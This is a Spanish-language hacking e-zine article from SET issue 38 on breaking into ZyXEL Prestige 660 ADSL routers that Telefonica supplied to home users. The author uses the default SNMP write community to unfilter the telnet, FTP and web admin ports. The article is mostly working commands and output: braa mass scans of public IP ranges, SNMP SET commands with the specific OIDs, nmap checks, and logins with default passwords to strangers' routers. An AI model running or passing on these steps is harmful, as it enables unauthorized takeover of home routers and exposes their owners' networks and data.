Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SET 038 0x07

eZine's profile picture
eZine lover (@eZine)
Published in 
Saqueadores Edicion Tecnica
 · 21 Aug 2019

  

-[ 0x07 ]-------------------------------------------------------------------- 
-[ Hacking ZyXEL Prestige 660 ]---------------------------------------------- 
-[ by d00han.t3am ]--------------------------------------------------SET-38-- 

 
                         Hacking ZyXEL Prestige 660 
                  Autor: d00han.t3am - d00han.t3am@gmail.com 

 

<S3ns1b1l1dAd hack3er> 

Son las 02.17 a.m y mis dos chicas estan durmiendo desde hace 3 horas. 
El trabajo oficial, el no oficial, la familia y hack hacen que dormir sea 
un lujo. A las 06.45 a.m. en pie y a exprimir otro dia como si fuera el 
ultimo. 

Tras releer un SET, el numero 35 concretamente, me invadieron unas ganas 
enormes de ponerme a escribir cosas que no todo el mundo sabe. En la 
Editorial de dicho numero "el nuevo Editor" nos incitaba a los lectores a 
escribir tras motivarnos con un ejemplo. 

Vale, ahora entendereis porque este articulo se lo dedico a Daniela, mi hija. 
Somos los mejores! 

</S3ns1b1l1dAd hack3er> 

 

[=][=][=][=][=][=][=][=][=][=][=][=][=] 
[  Hacking Zyxel Prestige 600 series  ] 
[=][=][=][=][=][=][=][=][=][=][=][=][=] 

Desde hace tiempo utilizo las tecnicas que voy a exponer para mis propios 
fines. He avisado a las empresas aludidas, como son el fabricante "ZyXEL" 
y el distribuidor/proveedor de servicios "Telefonica" sin obtener respuesta. 
Pues nada, ha llegado la hora de hacerlo publico. 

A~os atras se descubrieron ciertas vulnerabilidades que en teoria podrian 
revelar informacion sensible y realizar ciertos cambios de configuracion 
(no se indican cuales ni como). 
(Ref: http://www.juniper.net/security/auto/vulnerabilities/vuln27918.html) 
En todo caso, en este "paper" se describe como saltarse el filtrado de 
puertos de administracion de forma practica. 

 
Para quien no lo sepa, estos routers ADSL son los que dan acceso a una gran 
parte de la poblacion en Espa~a gracias al proveedor de servicios "Telefonica 
de Espanya". Los ha estado instalado durante mas de 3 anyos si no me equivoco. 

Los routers vulnerables al ataque que se describira son concretamente los 
Prestige P-660HW-D1,  P-660R-D1 y el mas antiguo P-650HW-31.  

Por defecto, algunos routers de la serie 600 traen el servicio SNMP activado 
con su respectivo puerto UDP 161 abierto accesible desde la interface LAN y 
WAN. Esto en si no es un problema siempre y cuando se proteja por contrase~a 
y no se pueda modificar nada. Pues normalmente no es asi, es decir, la 
contrase~a de lectura o GET es "public" y la de escritura o SET es "public" 
y no existe ningun tipo de filtrado a este puerto/protocolo. 

Normalmente, el protocolo SNMP y los datos a los que se acceden se utilizan 
para monitorizar el estado del dispositivo. La brecha de seguridad se abre 
aqui, pero realmente el problema viene cuando podemos MODIFICAR la 
configuracion del dispositivo a nuestro antojo. 

Entre otras delicias, podemos: 

* Conocer direcciones IPs asignadas por DHCP en la LAN 
* Conocer las MACs de los dispositivos de la LAN (y por tanto sus marcas-modelo) 
* Conocer y cambiar el nombre del dispositivo. Saber el tiempo que lleva online. 
* Inyectar codigo XSS que nos revele la password de admin del router (no se 
  trata aqui) 
* ABRIR puertos filtrados hacia la interfaz WAN ;) *** increible, pero sigue 
  leyendo *** 

Una vez que los puertos estan abiertos ya depedende de la imaginacion de cada 
uno hasta donde se puede llegar, a mi de pronto se me ocurre: 

* Entrar en la interface web o telnet (con las pass por defecto o fuerza bruta) 
  y redirijir los puertos NetBios/RPC/VNC/Terminal Server a una maquina Windows 
  del interior o los equivalentes para un servidor linux 

 

[=][=][=][=][=][=][=][=][=] 
[  Conocimientos previos  ] 
[=][=][=][=][=][=][=][=][=] 

Pues como minimo te recomiendo que sepas algo de SNMP, MIBs, TELNET y utilizar 
el Nmap aunque si no te suena nada de lo que he expuesto hasta ahora pues... 
lo tienes crudo. 

Aqui referencio algo de culturilla: 

   * http://es.wikipedia.org/wiki/SNMP 
   * http://es.wikipedia.org/wiki/MIB 
   * http://www.zyxel.es/descargas09/Actualizacion%20Firmware%20Telefonica%20 
     en%20Routers%20ZyXEL.pdf 
   * http://www.zyxel.es/descargas09/ (documentacion actualizada Zyxel) 
   * http://www.oidview.com/mibs/890/ZYXEL-MIB.html  ¡¡¡¡ OIDs de ZyXEL !!!! 
   * google: SNMPv2-MIB.iso.org.dod.internet   

Dicho de manera muy simple, el protocolo SNMP utiliza MIBs para intereaccionar 
con el dispositivo. Por ejemplo, si hacemos una peticion SNMP a un router usando 
la OID .1.3.6.1.2.1.1.1.0 nos respondera con un string indicando el Modelo. 

Una MIB digamos que es una base de datos de OIDs para interaccionar con un 
dispositivo via protocolo SNMP. Las MIBs que utilizamos aqui no son las 
"estandar" ;) . Son especificas de los routers ZyXEL y es mas, muchas de ellas 
tampoco aparecen en la documentacion oficial, se han obtenido, digamos que, 
por fuerza bruta. Las OIDs estan estructuradas jerarquicamente y "andando" por 
ellas y bajando de nivel podemos encontrar sorpresas; sorpresas que nos pueden 
ayudar a cambiar la configuracion sin permisos de administrador. 

ZyXEL por ejemplo, tiene MIBs propias, se encabezan bajo la jeraquia: 

     :.1.3.6.1.4.1.890.1.x.y.z 

 

[=][=][=][=][=][=] 
[  Herramientas  ] 
[=][=][=][=][=][=] 

En Linux podemos usar (incuido en BackTrack 3/4) 

 * braa  

En Windows podemos utilizar: 
  
 * Mib Browser - http://www.ireasoning.com/downloadmibbrowserfree.php  

Para ambos S.O. debemos disponer de Nmap y de algun escaner SNMP como el 
que incluye IP-Tools 2.0. En linux nos sobra con **braa** para hacer todo 
el trabajo. 

 

[=][=][=][=][=][=][=] 
[  El procedimiento ] 
[=][=][=][=][=][=][=] 

 * Identificar a la victima usando un escaner SNMP (recordad que esta penado 
   civilmente escanear IPs que no sean tuyas propias) 
 * Una vez identificada, ver si tiene abiertos los puertos de administracion 
   telnet, www y ftp. 
 * Si no los tiene abiertos, modificar la configuracion de filtrado usando 
   OIDs especificas. 
 * Lanzar un navegador web contra la aplicacion de configuracion http o un 
   telnet hacia el puerto 23 
 * Hacerse con un manual del modelo hackeado especifico y dejar volar la 
   imaginacion. 

 

Manos a la obra  (las IPs han sido modificadas para evitar suspicacias) 
=============== 

 * Escojo un rango IP que se de antemano que esta poblado de este tipo de 
   routers. Por ejemplo: 88.22.xyz.1 a 88.22.xyz.254 
 * Le decimos a **braa** que mire en ese rango  
 * Todos los routers que responden a un GET public: 

bt ~ # braa public@88.18.11.1-88.18.11.254:161:.1.3.6.1.2.1.1.1.0 
88.22.xyz.253:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.250:100ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.22.xyz.231:96ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.22.xyz.212:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.210:96ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.22.xyz.208:100ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.22.xyz.202:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.196:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.197:100ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.22.xyz.191:88ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.22.xyz.189:104ms:.1.3.6.1.2.1.1.1.0:Prestige 2602HWL-61C 
88.22.xyz.144:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.132:100ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.22.xyz.125:100ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.149:204ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.22.xyz.124:108ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.22.xyz.115:104ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.22.xyz.109:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.108:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.105:104ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.22.xyz.93:104ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.22.xyz.82:100ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.80:104ms:.1.3.6.1.2.1.1.1.0:Prestige 2602HWL-61C 
88.22.xyz.49:4ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.42:104ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.22.xyz.31:96ms:.1.3.6.1.2.1.1.1.0:Prestige 2602HWL-61C 
88.22.xyz.25:120ms:.1.3.6.1.2.1.1.1.0:Prestige 660R-61C 
88.22.xyz.22:108ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.22.xyz.194:100ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 *** DEMO 3 
88.22.xyz.7:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.6:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.22.xyz.100:100ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 ********** DEMO 1 
88.22.xyz.244:920ms:.1.3.6.1.2.1.1.1.0:P-660R-D1  ********** DEMO 2 
88.22.xyz.145:1020ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
bt ~ #   

 
DEMO 1: Modelo P-660HW-D1 
========================= 

 * OID del modelo: .1.3.6.1.2.1.1.1.0 

 # ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.2.1.1.1.0 
 88.22.xyz.100:110ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
 1 queries made, 1 queries acknowledged. 

 * Vemos como tiene los puertos 

 $ sudo nmap -p 80,21,23 88.22.xyz.100 

 Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:12 CEST 
 Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100): 
 PORT   STATE    SERVICE 
 21/tcp filtered ftp 
 23/tcp filtered telnet 
 80/tcp filtered http 

Nmap done: 1 IP address (1 host up) scanned in 2.399 seconds 

 * Leemos con una OID "especial" el estado de los filtros. 
 * Hacemos un GET con la OID .1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4 

  
# ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4 
88.22.xyz.100:138ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:80 

 * Como vemos, el resultado es "80". Interpreto que es el puerto 80 el que esta 
   filtrado. 
 * Con la OID :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5 nos muestra 21 (ftp) y  
   con :.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6 nos indica 23 (telnet) ¡¡ Que 
   interesante !! 

 * Vamos a cambiar los valores  ¡¡¡ a ver que pasa !!! 

# ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4 
=i81 
88.22.xyz.100:2044ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set. 
1 queries made, 1 queries acknowledged. 

# ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5 
=i22 
88.22.xyz.100:2051ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set. 
1 queries made, 1 queries acknowledged. 

# ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6 
=i24 
88.22.xyz.100:2048ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6:OK, set. 
1 queries made, 1 queries acknowledged. 

   
 * Volvemos a ejecutar Nmap 

 
socrates@CENTRAL:~$ sudo nmap -p 80,21,23 88.22.xyz.100 

Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-22 19:09 CEST 
Interesting ports on 100.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.100): 
PORT   STATE SERVICE 
21/tcp open  ftp 
23/tcp open  telnet 
80/tcp open  http 

Nmap done: 1 IP address (1 host up) scanned in 0.351 seconds 

 * Jajajajajaja Maaaagia. Aparecen ahora abiertos para toda internet. 

 * Probamos lanzar un telnet contra el router. La clave es la que viene por 
   defecto en estos modelos. 
 * Piensa que si su propietario tiene activada por defecto la gestion SNMP 
   tambien tendra la pass por defecto, tendra el SSID wifi y la WEP128 por 
   defecto, etc, etc. 

root@CENTRAL:/home/socrates/braa-0.82# telnet  88.22.xyz.100 
Trying 88.22.xyz.100... 
Connected to 88.22.xyz.100. 
Escape character is '^]'. 

Password: **** 

                    Copyright (c) 1994 - 2006 ZyXEL Communications Corp. 

                              P-660HW-D1 Main Menu 

     Getting Started                      Advanced Management 
       1. General Setup                     21. Filter Set Configuration 
       2. WAN Backup Setup                  22. SNMP Configuration 
       3. LAN Setup                         23. System Security 
       4. Internet Access Setup             24. System Maintenance 
                                            25. IP Routing Policy Setup 
     Advanced Applications                  26. Schedule Setup 
       11. Remote Node Setup 
       12. Static Routing Setup 
       14. Dial-in User Setup               99. Exit 
       15. NAT Setup 

 

 

                          Enter Menu Selection Number: 99 

 
Connection closed by foreign host. 

 * Seamos buenos. Vamos a dejarlo como lo encontramos. Volvemos a SETear las 
   OIDs a sus valores originales. 

# ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4 
=i80 
88.22.xyz.100:2044ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set. 
1 queries made, 1 queries acknowledged. 

# ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5 
=i21 
88.22.xyz.100:2051ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set. 
1 queries made, 1 queries acknowledged. 

# ./braa -v -t 5 -p 200 public@88.22.xyz.100:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6 
=i23 
88.22.xyz.100:2048ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6:OK, set. 
1 queries made, 1 queries acknowledged. 

 

DEMO 2: MODELO P-660R-D1 
======================== 

 * Seguimos el mismo procedimiento. 

bt ~ # braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.2.1.1.1.0 
88.22.xyz.244:110ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
1 queries made, 1 queries acknowledged. 
bt ~ #  

 * Veamos los puertos que nos interesan en que estado se encuentran. 

bt ~ # nmap -v -PN 88.22.xyz.244 -p21,23,80 

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-24 01:00 GMT 
Initiating Parallel DNS resolution of 1 host. at 01:00 
Completed Parallel DNS resolution of 1 host. at 01:00, 0.08s elapsed 
Initiating SYN Stealth Scan at 01:00 
Scanning 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244) [3 ports] 
Completed SYN Stealth Scan at 01:00, 3.03s elapsed (3 total ports) 
Host 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244) appears to be 
up ... good. 
Interesting ports on 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244): 
PORT   STATE    SERVICE 
21/tcp filtered ftp 
23/tcp filtered telnet 
80/tcp filtered http 

Read data files from: /usr/local/share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 3.143 seconds 
           Raw packets sent: 6 (264B) | Rcvd: 0 (0B) 

 * Bueno, estan filtrados, veamos si de dejan abrir. Ejecutemos el SET con los 
   OIDs conocidos: 

# braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4 
=i81 
88.22.xyz.244:2107ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set. 
1 queries made, 1 queries acknowledged. 
# braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5 
=i22 
88.22.xyz.244:2109ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set. 
1 queries made, 1 queries acknowledged. 
# braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6 
=i24 
88.22.xyz.244:2111ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6:OK, set. 
1 queries made, 1 queries acknowledged. 
# 

 * Ahora veamos con Nmap si han cambiado el estado de los puertos afectados. 

bt ~ # nmap -v -PN 88.22.xyz.244 -p21,23,80 

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-24 01:07 GMT 
Initiating Parallel DNS resolution of 1 host. at 01:07 
Completed Parallel DNS resolution of 1 host. at 01:07, 0.08s elapsed 
Initiating SYN Stealth Scan at 01:07 
Scanning 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244) [3 ports] 
Discovered open port 80/tcp on 88.22.xyz.244 
Discovered open port 23/tcp on 88.22.xyz.244 
Discovered open port 21/tcp on 88.22.xyz.244 
Completed SYN Stealth Scan at 01:07, 0.11s elapsed (3 total ports) 
Host 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244) appears to be 
up ... good. 
Interesting ports on 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244): 
PORT   STATE SERVICE 
21/tcp open  ftp 
23/tcp open  telnet 
80/tcp open  http 

Read data files from: /usr/local/share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 0.222 seconds 
           Raw packets sent: 3 (132B) | Rcvd: 3 (138B) 

 
 * Eurekaaaaa!!! 

$$ Vamos a lanzar un telnet, aunque podriamos acceder a la interfaz web, 
$$ pero esta no es la revisa adeacuada para ello ;P 

bt ~ # telnet 88.22.xyz.244 
Trying 88.22.xyz.244... 
Connected to 88.22.xyz.244. 
Escape character is '^]'. 

Password: **** 

 
                    Copyright (c) 1994 - 2006 ZyXEL Communications Corp. 

                              P-660R-D1  Main Menu 

     Getting Started                      Advanced Management 
       1. General Setup                     21. Filter Set Configuration 
       2. WAN Backup Setup                  22. SNMP Configuration 
       3. LAN Setup                         23. System Password 
       4. Internet Access Setup             24. System Maintenance 
                                            25. IP Routing Policy Setup 
     Advanced Applications                  26. Schedule Setup 
       11. Remote Node Setup 
       12. Static Routing Setup 
       15. NAT Setup                        99. Exit 

 

 

 
                          Enter Menu Selection Number: 99 

 
Connection closed by foreign host. 

 
 * Bueno... que carajo... vamos a lanzar un lynx contra el puerto http, 
   Viva el ASCII 8) 

bt ~ # lynx 88.22.xyz.244 

Username for 'P-660R-D1 ' at server '88.22.xyz.244': **** 
Password: **** 

                                                              Web Configurator 

   Site Map 
   ___________________________________________________________________________ 

 
   Wizard Setup     Advanced Setup     Maintenance 
   Wizard Setup Password 
   LAN 
   WAN 
   NAT 
   Security 
   Dynamic DNS 
   Time and Date 
   Remote Management 
   UPnP 
   Logs System Status 
   DHCP Table 
   Diagnostic 
   Firmware 
   If you see this message, it means you need a more CSS-compatible browser. 
   Such as MS Internet Explorer 4.0 or above. 
   ___________________________________________________________________________ 

 * Te ha gustado la experiencia de navegar en texto plano? A nuestro "editor" 
   tambien ;) 

 
 * Lo dejamos todo como estaba... probrecitos ;( 

# braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4 
=i80 
88.22.xyz.244:2109ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set. 
1 queries made, 1 queries acknowledged. 
# braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6 
=i23 
88.22.xyz.244:2109ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6:OK, set. 
1 queries made, 1 queries acknowledged. 
# braa -v -t 5 -p 200 public@88.22.xyz.244:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5 
=i21 
88.22.xyz.244:2108ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set. 
1 queries made, 1 queries acknowledged. 
# nmap -v -PN 88.22.xyz.244 -p21,23,80 

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-24 01:18 GMT 
Initiating Parallel DNS resolution of 1 host. at 01:18 
Completed Parallel DNS resolution of 1 host. at 01:18, 0.08s elapsed 
Initiating SYN Stealth Scan at 01:18 
Scanning 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244) [3 ports] 
Completed SYN Stealth Scan at 01:18, 3.02s elapsed (3 total ports) 
Host 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244) appears to be 
up ... good. 
Interesting ports on 244.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.244): 
PORT   STATE    SERVICE 
21/tcp filtered ftp 
23/tcp filtered telnet 
80/tcp filtered http 

Read data files from: /usr/local/share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 3.133 seconds 
           Raw packets sent: 6 (264B) | Rcvd: 0 (0B) 
             

 

 
DEMO 3: MODELO P-660HW-61 
========================= 

 * Identificamos 

bt ~ # braa -v -t 5 -p 200 public@88.22.xyz.194:.1.3.6.1.2.1.1.1.0 
88.22.xyz.194:108ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
1 queries made, 1 queries acknowledged. 

 * Vemos los puertos 

bt ~ # nmap -v -PN -p21,23,80 88.22.xyz.194 

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-24 00:03 GMT 
Initiating Parallel DNS resolution of 1 host. at 00:03 
Completed Parallel DNS resolution of 1 host. at 00:03, 0.28s elapsed 
Initiating SYN Stealth Scan at 00:03 
Scanning 194.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.194) [3 ports] 
Completed SYN Stealth Scan at 00:03, 0.10s elapsed (3 total ports) 
Host 194.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.194) appears to be 
up ... good. 
Interesting ports on 194.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.194): 
PORT   STATE  SERVICE 
21/tcp closed ftp 
23/tcp closed telnet 
80/tcp closed http 

Read data files from: /usr/local/share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 0.418 seconds 
           Raw packets sent: 3 (132B) | Rcvd: 3 (138B) 

 * Este modelo muestra como cerrados los puertos 80, 21, 23 al contrario 
   de lo que pasaba con el anterior que los mostraba filtrados. 

 
 * Consultamos las oids anteriores para asegurarnos de que existen 

# braa -v -t 5 -p 200 public@88.22.xyz.194:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4 
88.22.xyz.194:108ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:Error [2] No such name. 
1 queries made, 1 queries acknowledged. 

 * Mal vamos, a este router no le suenan esta OID. 
   En este modelo se usa otro grupo de OIDs para cambiar el filtro.  
   Como lo se...? Lo se. OID: .1.3.6.1.4.1.890.1.2.1.5.2.1.8.12.1 

 
# braa public@88.22.xyz.194:161:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.12.1=24 
88.22.xyz.194:2095ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.12.1:OK, set. 

 * Bien, nos responde "OK, set". Veamos ahora que nos dice Nmap sobre el puerto 
   TELNET 

bt ~ # nmap -v -PN -p21,23,80 88.22.xyz.194 

Starting Nmap 4.60 ( http://nmap.org ) at 2009-06-24 00:20 GMT 
Initiating Parallel DNS resolution of 1 host. at 00:20 
Completed Parallel DNS resolution of 1 host. at 00:20, 0.12s elapsed 
Initiating SYN Stealth Scan at 00:20 
Scanning 194.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.194) [3 ports] 
Completed SYN Stealth Scan at 00:20, 0.11s elapsed (3 total ports) 
Host 194.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.194) appears to be 
up ... good. 
Interesting ports on 194.Red-88-22-xyz.staticIP.rima-tde.net (88.22.xyz.194): 
PORT   STATE  SERVICE 
21/tcp closed ftp 
23/tcp closed telnet 
80/tcp closed http 

Read data files from: /usr/local/share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 0.261 seconds 
           Raw packets sent: 3 (132B) | Rcvd: 3 (138B) 

bt ~ # telnet 88.22.xyz.194 
Trying 88.22.xyz.194... 
telnet: connect to address 88.22.xyz.194: Connection refused 

 
 * Que sorpresa!, NO es vulnerable a pesar de poder modificar 
   los valores de filtrado. 
 * Para vuestra informacion el 650HW-31 tampoco es vulnerable 
   o al menos usando estas oids :-? 

 * Lo volvemos a dejar como estaba antes de experimentar 

bt ~ # braa public@88.22.xyz.194:161:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.12.1=23 
88.22.xyz.194:2097ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.12.1:OK, set. 
                                                           

 
[=][=][=][=][=] 
[  MISCELANEA ] 
[=][=][=][=][=] 

OIDs varias para un mejor hacking ;) 
==================================== 

 * Que quereis saber que MAC tiene la IP interna 192.168.1.33 pues nada.... 

# ./braa -v -t 5 -x -p 200 public@88.22.xyz.100:.1.3.6.1.2.1.4.22.1.2.1.192.168. 
1.33 
88.22.xyz.100:107ms:.1.3.6.1.2.1.4.22.1.2.1.192.168.1.33:001f169c4a24 

 * Listar los interfaces de red:  

OID: .1.3.6.1.2.1.2.2.1.2.1 
Value: enet0 

OID: .1.3.6.1.2.1.2.2.1.2.2 
Value: enet1 

OID: .1.3.6.1.2.1.2.2.1.2.3 
Value: pppoe 

 * Todos los routers que responden a un GET public: 

bt ~ # braa public@88.18.11.1-88.18.11.254:161:.1.3.6.1.2.1.1.1.0 
88.18.11.253:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.250:100ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.231:96ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.212:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.210:96ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.208:100ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.202:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.196:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.197:100ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.191:88ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.189:104ms:.1.3.6.1.2.1.1.1.0:Prestige 2602HWL-61C 
88.18.11.144:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.132:100ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.125:100ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.149:204ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.124:108ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.115:104ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.109:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.108:104ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.105:104ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.93:104ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.82:100ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.80:104ms:.1.3.6.1.2.1.1.1.0:Prestige 2602HWL-61C 
88.18.11.49:4ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.42:104ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.31:96ms:.1.3.6.1.2.1.1.1.0:Prestige 2602HWL-61C 
88.18.11.25:120ms:.1.3.6.1.2.1.1.1.0:Prestige 660R-61C 
88.18.11.22:108ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.19:100ms:.1.3.6.1.2.1.1.1.0:Prestige 660HW-61 
88.18.11.7:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.6:96ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.1:100ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
88.18.11.146:920ms:.1.3.6.1.2.1.1.1.0:P-660R-D1 
88.18.11.145:1020ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1 
bt ~ #   

 * Todos los P-660R-D1 

bt ~ # braa public@88.22.xyz.100-88.22.xyz.254:161:.1.3.6.1.4.1.890.1.2.6.60 
88.22.xyz.244:100ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.236:88ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.231:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.229:96ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.226:100ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.205:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.198:100ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.194:100ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.168:104ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
88.22.xyz.160:100ms:.1.3.6.1.4.1.890.1.2.6.60:Error [2] No such name. 
